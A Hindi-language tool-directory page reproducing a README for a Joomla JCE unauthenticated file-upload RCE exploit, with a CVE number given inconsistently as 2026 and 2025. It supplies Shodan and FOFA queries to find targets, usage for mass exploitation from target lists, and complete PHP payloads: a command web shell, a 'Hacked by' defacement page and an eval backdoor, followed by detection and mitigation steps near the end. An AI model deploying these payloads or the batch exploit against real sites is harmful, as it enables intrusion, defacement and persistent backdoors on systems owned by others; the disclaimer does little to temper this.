Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-48907 — CVE-2025-48907 - अप्रमाणित RCE शोषण Joomla JCE < 2.9.99.5 के लिए | Kitploit
उपकरण/GitHubGitHub/0xgh057r3c0n/cve-2026-48907
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHub0xgh057r3c0n/cve-2026-48907

CVE-2026-48907

CVE-2025-48907 - अप्रमाणित RCE शोषण Joomla JCE < 2.9.99.5 के लिए

रिपॉजिटरी देखें
411 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
Joomla Logo

CVE-2026-48907 - Joomla! JCE अप्रमाणित RCE

Joomla! JCE एक्सटेंशन < 2.9.99.5 - अप्रमाणित मनमाना PHP फ़ाइल अपलोड और रिमोट कोड निष्पादन

License: MIT Python 3.6+ Security Shodan FOFA


🔎 खोज इंजन क्वेरी

Shodan

root@kitploit:~
http.component:"Joomla"

FOFA

root@kitploit:~
app="Joomla"

📋 अवलोकन

इस रिपॉजिटरी में CVE-2026-48907 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है, जो 2.9.99.5 से पहले के Joomla! JCE (Joomla Content Editor) एक्सटेंशन संस्करणों में एक गंभीर भेद्यता है। यह भेद्यता अप्रमाणित हमलावरों को JCE प्रोफ़ाइल आयात कार्यक्षमता के माध्यम से मनमानी PHP फ़ाइलें अपलोड करने की अनुमति देती है, जिससे रिमोट कोड निष्पादन (RCE) होता है।

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।

  • केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है
  • लेखक किसी भी दुरुपयोग या अवैध गतिविधियों के लिए जिम्मेदार नहीं है
  • परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें

🔍 भेद्यता विवरण

यह कैसे काम करता है

  1. CSRF टोकन निकालना: एक्सप्लॉइट पहले लक्ष्य के होमपेज से CSRF टोकन निकालता है
  2. प्रोफ़ाइल आयात का दुरुपयोग: यह JCE प्रोफ़ाइल आयात कार्यक्षमता का लाभ उठाता है (index.php?option=com_jce&task=profiles.import)
  3. PHP फ़ाइल अपलोड: एक प्रोफ़ाइल XML फ़ाइल के रूप में छिपी एक दुर्भावनापूर्ण PHP फ़ाइल अपलोड करता है
  4. कोड निष्पादन: अपलोड की गई PHP फ़ाइल /tmp/ निर्देशिका में रखी जाती है और सीधे पहुँच के माध्यम से निष्पादित की जा सकती है

🚀 विशेषताएँ

  • ✅ कोई भी PHP फ़ाइल अपलोड करें: कस्टम PHP शेल, बैकडोर या विकृति पृष्ठ (PHP-आधारित) अपलोड करें
  • ✅ बैच प्रोसेसिंग: एक फ़ाइल से कई लक्ष्यों को स्कैन और शोषण करें
  • ✅ CSRF टोकन स्वतः-पता लगाना: स्वचालित रूप से CSRF टोकन निकालता है
  • ✅ वर्बोज़ मोड: डिबगिंग के लिए विस्तृत आउटपुट
  • ✅ परिणाम निर्यात: सफल अपलोड URL को एक फ़ाइल में सहेजें

📦 स्थापना

root@kitploit:~
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2025-48907.git
cd CVE-2025-48907

# Install required dependencies
pip3 install requests urllib3

आवश्यकताएँ

  • Python 3.6 या इससे उच्च
  • requests लाइब्रेरी
  • urllib3 लाइब्रेरी

🎯 उपयोग

मूल सिंटैक्स

root@kitploit:~
python3 CVE-2025-48907.py -u <TARGET_URL> -F <PHP_FILE_TO_UPLOAD>

उदाहरण

PHP वेब शेल अपलोड करें

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php

PHP विकृति पृष्ठ अपलोड करें

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F deface.php

PHP बैकडोर अपलोड करें

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F backdoor.php

लक्ष्य फ़ाइल के साथ बैच शोषण

root@kitploit:~
python3 CVE-2025-48907.py -f targets.txt -F payload.php

वर्बोज़ आउटपुट और परिणाम सहेजने के साथ

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php -v -o results.txt

कमांड लाइन तर्क

* या तो -u या -f प्रदान किया जाना चाहिए

लक्ष्य फ़ाइल प्रारूप

प्रति पंक्ति एक URL के साथ एक targets.txt फ़ाइल बनाएँ:

root@kitploit:~
http://joomla-site1.com
https://joomla-site2.com
http://192.168.1.100/joomla
# Comments are ignored
https://example-joomla.com

🔧 PHP पेलोड बनाना

सभी पेलोड PHP फ़ाइलें होनी चाहिए क्योंकि एक्सप्लॉइट PHP कोड अपलोड करता है जो सर्वर पर निष्पादित होगा।

PHP वेब शेल

shell.php बनाएँ:

root@kitploit:~
<?php
// Simple PHP Web Shell
if(isset($_GET['cmd'])){
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
} else {
    echo "Usage: ?cmd=command";
}
?>

PHP विकृति पृष्ठ

deface.php बनाएँ:

root@kitploit:~
<?php
// PHP Deface Page
echo '<!DOCTYPE html>
<html>
<head>
    <title>Hacked by 0xgh057r3c0n</title>
    <style>
        body {
            background: #000;
            color: #0f0;
            font-family: "Courier New", monospace;
            text-align: center;
            padding: 50px;
        }
        h1 { font-size: 4em; text-shadow: 0 0 20px #0f0; }
        .ascii-art { white-space: pre; font-size: 12px; }
    </style>
</head>
<body>
    <h1>HACKED BY 0xgh057r3c0n</h1>
    <div class="ascii-art">
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ 
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
    ███████║███████║██║     █████╔╝ █████╗  ██║  ██║
    ██╔══██║██╔══██║██║     ██╔═██╗ ██╔══╝  ██║  ██║
    ██║  ██║██║  ██║╚██████╗██║  ██╗███████╗██████╔╝
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═════╝ 
    </div>
    <p>Security is not a product, it\'s a process.</p>
    <p>Server: <?php echo $_SERVER["SERVER_SOFTWARE"]; ?></p>
    <p>Time: <?php echo date("Y-m-d H:i:s"); ?></p>
</body>
</html>';
?>

PHP बैकडोर (न्यूनतम)

backdoor.php बनाएँ:

root@kitploit:~
<?php
// Minimal PHP Backdoor
if(isset($_REQUEST['c'])) { eval($_REQUEST['c']); }
?>

📊 आउटपुट उदाहरण

root@kitploit:~
_____________   _______________         _______________   ________  ________            _____   ______  ________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \/  _____/           /  |  | /  __  \/   __   \   _  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/   __  \   ______  /   |  |_>      <\____    /  /_\  \  /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  |__\  \ /_____/ /    ^   /   --   \  /    /\  \_/   \/    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \_____  /         \____   |\______  / /____/  \_____  /____/  
        \/                  \/                  \/     \/         \/     \/               |__|       \/                \/

Joomla! JCE extension < 2.9.99.5 Unauthenticated RCE
Author : 0xgh057r3c0n (PHP File Upload)

[*] Loaded 3 target(s)

[*] Target 1/3
[*] ==================================================
[+] Target: http://target-joomla.com
[+] Fetching CSRF token...
[+] CSRF Token: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6
[+] Uploading PHP file: cve-2026-48907-1234.xml.php
[+] Profile imported successfully!
[+] Testing uploaded PHP file...

============================================================
[!!!!!] PHP FILE UPLOADED SUCCESSFULLY!
[!!!!!] Server IS VULNERABLE to CVE-2025-48907!
============================================================

[+] View your uploaded PHP file: http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php
[+] Quick access:
    curl "http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php?cmd=id"

🛡️ पता लगाना और शमन

कैसे पता करें

  • /tmp/ निर्देशिका में संदिग्ध PHP फ़ाइलों की जाँच करें
  • लॉग में JCE प्रोफ़ाइल आयात गतिविधि की निगरानी करें
  • अप्रत्याशित index.php?option=com_jce&task=profiles.import अनुरोधों की तलाश करें
  • /tmp/ में .xml.php एक्सटेंशन वाली फ़ाइलों की जाँच करें
  • /tmp/ निर्देशिका से असामान्य PHP निष्पादन की निगरानी करें

शमन कदम

  1. JCE एक्सटेंशन अपडेट करें:

    • संस्करण 2.9.99.5 या उच्चतर पर अपग्रेड करें
    • यहाँ से डाउनलोड करें: JCE आधिकारिक वेबसाइट
  2. अस्थायी कार्य-समाधान:

    • यदि आवश्यक न हो तो JCE एक्सटेंशन अक्षम करें
    • वेब एप्लिकेशन फ़ायरवॉल (WAF) नियम लागू करें
    • /tmp/ निर्देशिका में PHP निष्पादन प्रतिबंधित करें
    • यदि आवश्यक न हो तो allow_url_fopen अक्षम करें
  3. समझौता के बाद की कार्रवाइयाँ:

    • /tmp/ से अपलोड की गई PHP फ़ाइलें हटाएँ
    • बैकडोर के लिए सिस्टम ऑडिट करें
    • सभी क्रेडेंशियल रीसेट करें (Joomla एडमिन, FTP, होस्टिंग)
    • अनधिकृत पहुँच के लिए सिस्टम लॉग की समीक्षा करें
    • अन्य समझौता की गई फ़ाइलों की जाँच करें

📝 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

License: MIT


🤝 योगदान

योगदान का स्वागत है! कृपया बेझिझक एक पुल रिक्वेस्ट सबमिट करें।

  1. रिपॉजिटरी को फोर्क करें
  2. अपनी फीचर ब्रांच बनाएँ (git checkout -b feature/AmazingFeature)
  3. अपने बदलाव कमिट करें (git commit -m 'Add some AmazingFeature')
  4. ब्रांच पर पुश करें (git push origin feature/AmazingFeature)
  5. एक पुल रिक्वेस्ट खोलें

⭐ स्टार इतिहास

यदि आपको यह उपकरण उपयोगी लगता है, तो कृपया इसे GitHub पर एक स्टार ⭐ देने पर विचार करें!


📞 संपर्क और सहायता

  • लेखक: 0xgh057r3c0n
  • GitHub: https://github.com/0xgh057r3c0n/CVE-2025-48907
  • मुद्दे: बग रिपोर्ट करें

🔗 संदर्भ

  • NVD - CVE-2025-48907
  • JCE आधिकारिक वेबसाइट
  • Joomla! सुरक्षा केंद्र

❤️ के साथ निर्मित 0xgh057r3c0n द्वारा
टूल डाउनलोड करें
गुणमान
CVE आईडीCVE-2026-48907
उत्पादJoomla! JCE Extension
प्रभावित संस्करण< 2.9.99.5
भेद्यता प्रकारअप्रमाणित PHP फ़ाइल अपलोड → RCE
CVSS स्कोर9.8 (गंभीर)
हमला वेक्टरनेटवर्क
प्रमाणीकरणकोई आवश्यक नहीं
प्रभावपूर्ण सिस्टम समझौता
तर्कआवश्यकविवरण
-u, --urlहाँ*एकल लक्ष्य URL (जैसे, http://target.com)
-f, --fileहाँ*लक्ष्य URL की सूची वाली फ़ाइल (प्रति पंक्ति एक)
-F, --upload-fileहाँअपलोड करने के लिए PHP फ़ाइल (शेल, बैकडोर, विकृति पृष्ठ)
-v, --verboseनहींडिबगिंग के लिए वर्बोज़ आउटपुट सक्षम करें
-o, --outputनहींसफल अपलोड URL को फ़ाइल में सहेजें